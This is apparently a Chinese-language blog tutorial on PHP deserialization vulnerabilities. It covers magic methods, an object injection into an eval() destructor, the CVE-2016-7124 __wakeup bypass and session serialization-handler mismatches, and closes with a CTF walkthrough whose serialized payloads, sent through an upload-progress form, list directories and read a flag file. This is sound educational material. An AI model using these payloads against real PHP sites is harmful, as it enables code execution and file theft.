<!DOCTYPE html>
<html lang="zh-CN">





<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/image3.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="zs0zrc&#39;s blog">
  <meta name="author" content="zs0zrc">
  <meta name="keywords" content="pwn CTF security anythings">
  <title>PHP反序列化漏洞学习 - zs0zrc</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css">

<link rel="stylesheet" href="/css/main.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css">


<!-- 自定义样式保持在最底部 -->


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>zs0zrc</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">分类</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">关于</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/image1.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  星期日, 五月 24日 2020, 8:34 早上
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    3.5k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      14 分钟
                  </span>
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  <span id="busuanzi_container_page_pv" class="post-meta" style="display: none">
                    <i class="far fa-eye" aria-hidden="true"></i>
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5 z-depth-3" id="board">
          <div class="post-content mx-auto" id="post">
            
              <p class="note note-warning">本文最后更新于：星期一, 六月 1日 2020, 9:36 上午</p>
            
            <div class="markdown-body">
              <h2 id="PHP反序列化漏洞学习"><a href="#PHP反序列化漏洞学习" class="headerlink" title="PHP反序列化漏洞学习"></a>PHP反序列化漏洞学习</h2><h3 id="PHP序列化"><a href="#PHP序列化" class="headerlink" title="PHP序列化"></a>PHP序列化</h3><p>PHP使用serialize()函数来进行序列化</p>
<p>函数原型：</p>
<pre><code class="php">serialize ( mixed $value ) : string
</code></pre>
<p>serialize()函数返回一个字符串，这个字符串包含了表示value的字节流，可以存储与任何地方，通常会存储在一个文本文件中。</p>
<p>序列化有利于存储或者传递PHP的值，同时不会丢失其类型和结构。</p>
<p><strong>序列化对象</strong></p>
<p>PHP中的对象可以被序列化，如果对象存在魔法函数<code>__sleep()</code>，那么在序列化前会调用魔法函数<code>__sleep()</code>，<code>__sleep()</code>函数必须返回一个数组，数组的内容是要进行序列化的属性。</p>
<p>demo1:</p>
<pre><code class="php">&lt;?php
class test{
    public $var = 0;
    public $name = &#39;default&#39;;

    public static function print_me(){
        echo &quot;&lt;p&gt;&quot;.$this-&gt;name.&quot;&lt;/p&gt;&quot;;
        echo &quot;&lt;/br&gt;&quot;;
    }
    public function __sleep(){
        return array(&#39;var&#39;,&#39;name&#39;);
    }
}

$var = new test()
$var-&gt;name = &#39;admin&#39;;

$s = serialize($var);
echo &quot;&lt;p&gt;&quot;.$s.&quot;&lt;/p&gt;&quot;;

?&gt;
</code></pre>
<p>输出结果：</p>
<blockquote>
<p> O:4:”test”:2:{s:3:”var”;i:1;s:4:”name”;s:5:”admin”;} </p>
</blockquote>
<p>对象序列化结果的格式：</p>
<blockquote>
<p>O:4:”test”:2:{s:3:”var”;i:1;s:4:”name”;s:5:”admin”;} </p>
<p>对象类型:长度:对象名:类中变量的个数:{类型:长度:值:类型:长度:值…..}</p>
</blockquote>
<p>对象类型的缩写集合：</p>
<pre><code>a - array                  b - boolean  
d - double                 i - integer
o - common object          r - reference
s - string                 C - custom object
O - class                  N - null
R - pointer reference      U - unicode string
</code></pre><p>上面demo中的类的属性仅有publics属性，而php中类的属性的权限一共有三种：public(公有的)、protected(受保护的)、private(私有的)。</p>
<p>三者的区别： 被定义为公有的类成员可以在任何地方被访问。被定义为受保护的类成员则可以被其自身以及其子类和父类访问。被定义为私有的类成员则只能被其定义所在的类访问 。</p>
<p>demo2:</p>
<pre><code class="php">&lt;?php
highlight_file(__FILE__);

class test{
    public $var = 0;
    public $name = &#39;default&#39;;
    protected $age = 20;
    private $password = &#39;123456&#39;;

    public function print_me(){
        echo &quot;&lt;p&gt;&quot;.$this-&gt;name.&quot;&lt;/p&gt;&quot;;
        echo &quot;&lt;/br&gt;&quot;;
    }

}

$a = new test();
$a-&gt;var = 1;
$a-&gt;name = &#39;admin&#39;;

$b = serialize($a);
echo &quot;&lt;p&gt;&quot;.$b.&quot;&lt;/p&gt;&quot;;

?&gt;

</code></pre>
<p>输出结果：</p>
<p><img src="/picture/image-20200529154603504.png" srcset="/img/loading.gif" alt="image-20200529154603504"></p>
<p>可以发现potected属性名称前会加一个<code>*</code>，它的属性名长度为6，是因为protect属性序列化的时候格式是%00*%00成员名，%00占一个字节，所以长度为6 。private属性序列化的时候格式是%00类名%00成员名，所以长度为14 。</p>
<p>常见类型的序列化：</p>
<p>demo3:</p>
<pre><code class="php">&lt;?php

$str =&quot;strings&quot;;
$int = 1;
$dou = 0.1;
$boole = True;
$null = NULl;
$arr = array(&#39;1&#39;,&#39;2&#39;);

echo serialize($int);
echo &quot;&lt;/br&gt;&quot;;
echo serialize($str);
echo &quot;&lt;/br&gt;&quot;;
echo serialize($dou);
echo &quot;&lt;/br&gt;&quot;;
echo serialize($boole);
echo &quot;&lt;/br&gt;&quot;;
echo serialize($null);
echo &quot;&lt;/br&gt;&quot;;
echo serialize($arr);
echo &quot;&lt;/br&gt;&quot;;
?&gt;
</code></pre>
<p>输出结果：</p>
<blockquote>
<p> i:1;<br>s:7:”strings”;<br>d:0.10000000000000001;<br>b:1;<br>N;<br>a:2:{i:0;s:1:”1”;i:1;s:1:”2”;} </p>
</blockquote>
<h3 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP反序列化"></a>PHP反序列化</h3><p>PHP反序列化使用 <strong>unserialize()</strong> 对单一的已序列化的变量进行操作，将其转换回 PHP 的值。 </p>
<p>函数原型：</p>
<pre><code class="php">unserialize ( string $str ) : mixed
</code></pre>
<p>如果反序列化后的对象存在<code>__wakeup()</code>方法，那么在反序列化成功后，php会自动的去调用<code>__wakeup()</code>方法。</p>
<h3 id="PHP魔术方法"><a href="#PHP魔术方法" class="headerlink" title="PHP魔术方法"></a>PHP魔术方法</h3><p>PHP将所有以两个下划线为开头的类方法保留为魔术方法。</p>
<p>常见的魔术方法：</p>
<ul>
<li>__sleep()</li>
<li>__wakeup()</li>
<li>__construct()</li>
<li>__destruct()</li>
<li>__call()</li>
<li>__callStatic()</li>
<li>__toString()</li>
<li>__invoke()</li>
<li>__get()</li>
<li>__set()</li>
<li>__isset()</li>
<li>__unset()</li>
</ul>
<p><strong>__sleep()</strong></p>
<p>__sleep()方法在对象被序列化前调用，会返回一个数组，其中包含者要被序列化的属性。它通常用于提交未提交的数据或者类似的清理操作。</p>
<p>函数原型：</p>
<pre><code class="php">public __sleep ( void ) : array
</code></pre>
<p><strong>__wakeup()</strong></p>
<p>unserialize()函数会检查反序列化的对象是否存在一个__wakeup()方法，如果存在，反序列化成功后会自动的去调用这个方法。这个方法通常用于初始化操作，如重新建立数据库链接。</p>
<p>函数原型：</p>
<pre><code class="php">__wakeup ( void ) : void
</code></pre>
<p><strong>__construct()</strong></p>
<p>__construct()方法是类的构造函数，每次创建新对象时都会调用这个方法。</p>
<p>函数原型：</p>
<pre><code class="php">__construct ([ mixed $args [, $... ]] ) : void
</code></pre>
<p><strong>__destruct()</strong></p>
<p>__destruct()方法是类的析构函数，析构函数会在某个对象的所有引用被删除或者当对象被显示销毁时执行，通常是脚本结束时执行。</p>
<p>函数原型：</p>
<pre><code class="php">__destruct ( void ) : void
</code></pre>
<p><strong>__call()</strong></p>
<p>当对象调用了一个不可访问的方法时，__call()就会被调用。</p>
<p>函数原型：</p>
<pre><code class="php">public __call ( string $name , array $arguments ) : mixed
</code></pre>
<p>其中$name是要调用的方法的名称，$arguments是要传给调用方法的参数</p>
<p><strong>__callStatic()</strong></p>
<p> 从PHP5.3开始出现此方法, 当在静态上下文中调用一个不可访问方法时，__callStatic()方法会被调用。</p>
<p>函数原型：</p>
<pre><code class="php">public static __callStatic ( string $name , array $arguments ) : mixed
</code></pre>
<p><strong>__toString()</strong></p>
<p>当对象被echo输出时，会调用__toString()方法。这个方法必须返回一个字符串。</p>
<p><strong>__invoke()</strong></p>
<p>当尝试以调用函数的方式来调用一个对象时，__invoke()方法会被调用。</p>
<p>函数原型：</p>
<pre><code class="php">__invoke ([ $... ] ) : mixed
</code></pre>
<p><strong>__get()</strong></p>
<p>当读取不可访问属性时，__get()会被调用</p>
<p>函数原型：</p>
<pre><code class="php">public __get ( string $name ) : mixed
</code></pre>
<p><strong>__set()</strong></p>
<p>当给不可访问属性赋值时，__set()方法会被调用</p>
<p>函数原型：</p>
<pre><code class="php">public __set ( string $name , mixed $value ) : void
</code></pre>
<p><strong>__isset()</strong></p>
<p>当对不可访问属性调用isset()或empty()时，__isset()会被调用。</p>
<p>函数原型：</p>
<pre><code class="php">public __isset ( string $name ) : bool
</code></pre>
<p><strong>__unset()</strong></p>
<p>当对不可访问属性调用unset()时，__unset()函数会被调用。</p>
<p>函数原型：</p>
<pre><code class="php">public __unset ( string $name ) : void
</code></pre>
<h3 id="PHP反序列化漏洞"><a href="#PHP反序列化漏洞" class="headerlink" title="PHP反序列化漏洞"></a>PHP反序列化漏洞</h3><p>开发者在写程序时没有控制好传递给unserialize()函数的变量，导致用户可以控制反序列化的内容，攻击者可以提交特定的序列化字符串给unserialize()函数，可以实现PHP对象注入，最终可能会导致任意代码执行等问题。</p>
<p>例如:</p>
<pre><code class="php">&lt;?php

class test{
    public $var;
    function __construct(){
        echo &#39;hello&#39;;
    }
    function __destruct(){
        eval($this-&gt;var);
    }
}


$a = new test();
unserialize($_GET[&#39;a&#39;]);
</code></pre>
<p>类test中有一个<code>__construct()</code>构造函数和一个<code>__destruct()</code>析构函数。构造函数输出一个字符串，析构函数将属性var传给eval执行。</p>
<p>构造代码：</p>
<pre><code class="php">&lt;?php

class test{
    public $var=&#39;phpinfo();&#39;;

}

$a = new test();
echo serialize($a);
</code></pre>
<p>得到序列化字符串：</p>
<blockquote>
<p>O:4:”test”:1:{s:3:”var”;s:10:”phpinfo();”;}</p>
</blockquote>
<p><img src="/picture/image-20200530154450443.png" srcset="/img/loading.gif" alt="image-20200530154450443"></p>
<h4 id="wakeup-方法绕过"><a href="#wakeup-方法绕过" class="headerlink" title="__wakeup()方法绕过"></a>__wakeup()方法绕过</h4><p>PHP反序列化漏洞CVE-2016-7124</p>
<blockquote>
<p>当反序列化字符串时，如果表示属性个数的值大于真实属性个数时，就会绕过__wakeup函数的执行</p>
</blockquote>
<p>适用版本：</p>
<p>PHP5&lt;5.6.25</p>
<p>PHP7&lt;7.0.10</p>
<p>demo</p>
<pre><code class="php">&lt;?php

class test{
    public $var;
    function __construct($a){
        $this-&gt;var = $a;
    }
    function __wakeup(){
        if(!isset($this-&gt;var)){
            $this-&gt;var = &#39;hello&#39;;
        }else{
            $this-&gt;var = &#39;hello&#39;;
        }
    }
    function __destruct(){
        echo &quot;var is &quot;.$this-&gt;var.&quot;\n&quot;; 
    }
}
$b = unserialize($_GET[&#39;a&#39;]);
</code></pre>
<p>上面的代码<code>__wakeup()</code>会将var初始化为’hello’，但是当传入序列化字符串中的属性个数比实际大时就会绕过<code>__wakeup()</code>方法。</p>
<p>构造序列化字符串：</p>
<blockquote>
<p>O:4:”test”:2:{s:3:”var”;s:3:”pwn”;}</p>
</blockquote>
<p><img src="/picture/image-20200530162155281.png" srcset="/img/loading.gif" alt="image-20200530162155281"></p>
<p><code>__wakeup()</code>方法就被绕过了，var的值被设为了’pwn’.</p>
<h4 id="Session反序列化漏洞"><a href="#Session反序列化漏洞" class="headerlink" title="Session反序列化漏洞"></a>Session反序列化漏洞</h4><p>前置知识：</p>
<p><strong>序列化处理器</strong></p>
<p>PHP序列化处理一共有三种：php_serialize、php_binary和php(需要编译时开启支持)</p>
<p>它们三者的存储格式分别为：</p>
<p>php_serialize：serialize()函数序列化处理的数组</p>
<p>php_binary：键名的长度对应的ascii字符+键名+经过serialize()序列化处理的值</p>
<p>php：键名 + 竖线+ 经过serialize()函数序列化处理的值</p>
<p>例如：</p>
<pre><code class="php">$_SESSION[&#39;user&#39;] = $_GET[&#39;a&#39;];
</code></pre>
<p>假设传进去的字符串为”admin”，那么经过三者序列化处理的字符串分别为：</p>
<p>php_serialize : a:1{s:4:”user”;s:5:”admin”;}</p>
<p>php_binary : (4所对应的ascii码)+user:5:”admin”</p>
<p>php : user|s:5:”admin”</p>
<p><strong>Session的基本原理</strong></p>
<p>Session是存储在服务端的会话，对比cookie来说，相对安全，而且不像cookie那样有存储长度限制。当浏览器第一次发送请求时，服务器会自动生成一个Session和一个Session ID用来唯一表示这个Session，并且将它通过相应发送给服务器。浏览器第二次发送请求时，会将之前获得的Session ID放在请求中一起发给服务器，然后服务器从请求中提取Session ID，将这个ID和保存的Session ID对比，找到对应的Session。</p>
<p>通常session存储的文件名为sess_ + PHPSESSID。</p>
<p><strong>Session序列化机制</strong></p>
<p>当会话自动开始或者通过 session_start() 手动开始的时候， PHP 内部会依据客户端传来的PHPSESSID来获取现有的对应的会话数据（即session文件）， PHP 会自动反序列化session文件的内容，并将之填充到 $_SESSION 超级全局变量中。如果不存在对应的会话数据，则创建名为sess_PHPSESSID(客户端传来的)的文件。如果客户端未发送PHPSESSID，则创建一个由32个字母组成的PHPSESSID，并返回set-cookie。 </p>
<p><strong>php.ini配置</strong></p>
<p>php.ini中有一些关于session的配置，我们需要知道的有这几个</p>
<pre><code>session.save_path=&quot;&quot; --设置session的存储路径
session.save_handler=&quot;&quot;--设定用户自定义存储函数，如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.auto_start boolen--指定会话模块是否在请求开始时启动一个会话默认为0不启动
session.serialize_handler string--定义用来序列化/反序列化的处理器名字。默认使用php
</code></pre><p><strong>漏洞原理</strong></p>
<p>Session反序列化漏洞原理挺简单的，就是处理Session序列化和Session反序列化的引擎不同，利用引擎之间的差异产生了序列化注入漏洞。</p>
<p>例子：</p>
<p>session1.php</p>
<pre><code class="php">&lt;?php
ini_set(&quot;session_serialize_handler&quot;,&quot;php_serialize&quot;);
session_start();
$_SESSION[&#39;a&#39;]=$_GET[&#39;a&#39;];
</code></pre>
<p>session2.php</p>
<pre><code class="php">&lt;?php
ini_set(&quot;session_serialize_handler&quot;,&quot;php&quot;);
session_start();

class test{
    public $strings=&quot;hello&quot;;
    function __wakeup(){
        echo &quot;strings is &quot;.$this-&gt;strings;
    }
}
</code></pre>
<p>首先通过访问session1.php写入session，因为session1.php使用的引擎是php_serialize()，所以存储格式为serialize()函数处理的格式，传入一个<code>|</code>会被当作普通字符。但是当访问session2.php时，使用的引擎是php，它会将<code>|</code>当作键名与值得分隔符，从而产生歧义，导致在解析session文件时对<code>|</code>后的值做了反序列化处理。</p>
<p>攻击payload生成:</p>
<pre><code class="php">&lt;?php
class test{
    public $stings=&quot;pwn&quot;;
}
echo serialize(new test());
</code></pre>
<p>输出：</p>
<blockquote>
<p> O:4:”test”:1:{s:6:”stings”;s:3:”pwn”;} </p>
</blockquote>
<p>最终payload:</p>
<blockquote>
<p>|O:4:”test”:1:{s:6:”stings”;s:3:”pwn”;} </p>
</blockquote>
<p>访问session1.php，可以发现payload被写入session文件里了</p>
<p><img src="/picture/image-20200531190020147.png" srcset="/img/loading.gif" alt="image-20200531190020147"></p>
<p>这时访问session2.php，那么php引擎就会将<code>|</code>后的当作序列化字符串进行反序列化，页面上就会输出”strings is pwn”。</p>
<p><strong>利用 upload_process 机制</strong></p>
<p>如果不能直接控制SESSION值时，可以通过 upload_process 机制来往$_SESSION中写入值。</p>
<blockquote>
<p>当 session.enabled INI 选项开启时，PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助，但在文件上传时应用可以发送一个POST请求到终端（例如通过XHR）来检查这个状态。</p>
<p>当一个上传在处理中，同时POST一个与INI中设置的session.upload_progress.name同名变量时，上传进度可以在$_SESSION中获得。 当PHP检测到这种POST请求时，它会在$SESSION中添加一组数据, 索引是session.upload_progress.prefix与 session.upload_progress.name连接在一起的值。</p>
</blockquote>
<p>jarvisoj上有道这样的题目：PHPINFO</p>
<pre><code class="php">&lt;?php
//A webshell is wait for you
ini_set(&#39;session.serialize_handler&#39;, &#39;php&#39;);
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this-&gt;mdzz = &#39;phpinfo();&#39;;
    }

    function __destruct()
    {
        eval($this-&gt;mdzz);
    }
}
if(isset($_GET[&#39;phpinfo&#39;]))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents(&#39;index.php&#39;));
}
?&gt;
</code></pre>
<p>可以发现它一开始就通过ini_set设置使用php引擎，当GET传入一个phpinfo变量时，就会new一个OowoO对象，OowoO对象中的<code>__construct()</code>会初始化mdzz属性为”phpinfo();”，而它的<code>__destruct()</code>会执行eval($this-&gt;mdzz)，将phpinfo信息打印出来。</p>
<p><img src="/picture/image-20200531193728586.png" srcset="/img/loading.gif" alt="image-20200531193728586"></p>
<p>通过phpinfo的信息可以知道它处理session的引擎不一致</p>
<blockquote>
<p>local: php</p>
<p>master: php_serialize</p>
</blockquote>
<p>其中local指的是当前目录中，它会将master的内容， 而master指的是php.ini设置的session.serialize_handler。所以很明显这里存在session反序列化漏洞。</p>
<p>接下来就是如何往session中写入内容。</p>
<p>通过phpinfo的信息可以发现它session_upload_progress_enabled是开启的，同时session_upload_progress_cleanup是关闭的，这允许我们在一个文件上传的时候，通过POST请求一个与INI中设置的session.upload_progress.name同名变量，来往session中写入内容，并且它的值能被保存下来。</p>
<p>构建一个文件上传的html：</p>
<pre><code class="html">&lt;form action=&quot;http://web.jarvisoj.com:32784/index.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;123&quot; /&gt;
    &lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;
    &lt;input type=&quot;submit&quot; /&gt;
&lt;/form&gt;
</code></pre>
<p>因为它disable_function经用了一堆调用系统命令的函数， 所以只能用php自带函数来读取目录和文件内容 。</p>
<p><img src="/picture/image-20200531203023847.png" srcset="/img/loading.gif" alt="image-20200531203023847"></p>
<p>构建poc</p>
<pre><code class="php">class OowoO{
    public $mdzz=&quot;print_r(scandir(dirname(__FILE__)));&quot;;

}
$a = new OowoO();
echo serialize($a);
</code></pre>
<p>输出 ：</p>
<pre><code>O:5:&quot;OowoO&quot;:1:{s:4:&quot;mdzz&quot;;s:36:&quot;print_r(scandir(dirname(__FILE__)));&quot;;}
</code></pre><p>最终payload:</p>
<pre><code class="php">|O:5:\&quot;OowoO\&quot;:1:{s:4:\&quot;mdzz\&quot;;s:36:\&quot;print_r(scandir(dirname(__FILE__)));\&quot;;}
</code></pre>
<p>抓包，其中 http报文中的filename的值对应</p>
<p><code>$_SESSION[&#39;upload_progress_laruence&#39;][&#39;files&#39;][0][&#39;name&#39;]</code><br>http报文中的name的值对应<br><code>$_SESSION[&#39;upload_progress_laruence&#39;][&#39;files&#39;][0][&#39;filed_name&#39;]</code> </p>
<p>这两处都可以攻击，这里选择将filename修改为payload</p>
<p><img src="/picture/image-20200531201731257.png" srcset="/img/loading.gif" alt="image-20200531201731257"></p>
<p>可以返回的文件名中包含有Here_1s_7he_fl4g_buT_You_Cannot_see.php</p>
<p>flag就在这个文件里，通过phpinfo可以得到文件的绝对路径，然后就可以利用file_get_content函数读取flag出来。</p>
<p><img src="/picture/image-20200531202327222.png" srcset="/img/loading.gif" alt="image-20200531202327222"></p>
<p>路径：/opt/lamp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php</p>
<p>替换payload里的<code>print_r(scandir(dirname(__FILE__)));</code>为<code>print_r(file_get_content(\&quot;/opt/lamp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\&quot;))</code>来读取flag</p>
<p>payload:</p>
<pre><code>|O:5:\&quot;OowoO\&quot;:1:{s:4:\&quot;mdzz\&quot;;s:88:\&quot;print_r(file_get_contents(\&quot;/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\&quot;));\&quot;;}
</code></pre><p><img src="/picture/image-20200531202857396.png" srcset="/img/loading.gif" alt="image-20200531202857396"></p>
<h3 id="REFERENCE"><a href="#REFERENCE" class="headerlink" title="REFERENCE"></a>REFERENCE</h3><ul>
<li><a href="https://xz.aliyun.com/t/7366#toc-3" target="_blank" rel="noopener">https://xz.aliyun.com/t/7366#toc-3</a> </li>
<li><a href="https://xz.aliyun.com/t/3674#toc-13" target="_blank" rel="noopener">https://xz.aliyun.com/t/3674#toc-13</a> </li>
<li><a href="https://xz.aliyun.com/t/7570#toc-11" target="_blank" rel="noopener">https://xz.aliyun.com/t/7570#toc-11</a> </li>
<li><a href="https://websec.readthedocs.io/zh/latest/language/php/unserialize.html" target="_blank" rel="noopener">https://websec.readthedocs.io/zh/latest/language/php/unserialize.html</a> </li>
</ul>

            </div>
            <hr>
            <div>
              <p>
                
                  <span>
                <i class="iconfont icon-inbox"></i>
                    
                      <a class="hover-with-bg" href="/categories/WEB/">WEB</a>
                      &nbsp;
                    
                  </span>&nbsp;&nbsp;
                
                
              </p>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
            </div>

            
              <!-- Comments -->
              <div class="comments" id="comments">
                
                
  <script defer src="https://utteranc.es/client.js" repo="zszcr/comment" issue-term="pathname" label="utterances" theme="github-light" crossorigin="anonymous" async>
  </script>


              </div>
            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc-start"></div>
<div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    </div>
    
  <div>
    
      <!-- 不蒜子统计PV -->
      
      <span id="busuanzi_container_site_pv" style="display: none">
      总访问量 <span id="busuanzi_value_site_pv"></span> 次
    </span>
    
    
      <!-- 不蒜子统计UV -->
      
      <span id="busuanzi_container_site_uv" style="display: none">
      总访客数 <span id="busuanzi_value_site_uv"></span> 人
    </span>
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js"></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js"></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js"></script>
<script src="/js/main.js"></script>


  <script src="/js/lazyload.js"></script>



  
  <script src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js"></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var post = $('#post');
      var toc = $('#toc');
      var tocLimMax = post.offset().top + post.height() - navHeight;

      $(window).scroll(function () {
        var tocLimMin = $('#toc-start').offset().top - navHeight;
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;

        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': navHeight,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
      var offset = $('#board-ctn').css('margin-right')
      $('#toc-ctn').css({
        'right': offset
      })
    });
  </script>







  <script defer src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




<!-- Plugins -->


  

  
    <!-- Google Analytics -->
    <script defer>
      (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
          (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o),
          m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
      })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');

      ga('create', 'UA-160202176-1', 'auto');
      ga('send', 'pageview');
    </script>
  

  

  

  



  <script src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js"></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js"></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "PHP反序列化漏洞学习&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js"></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js"></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
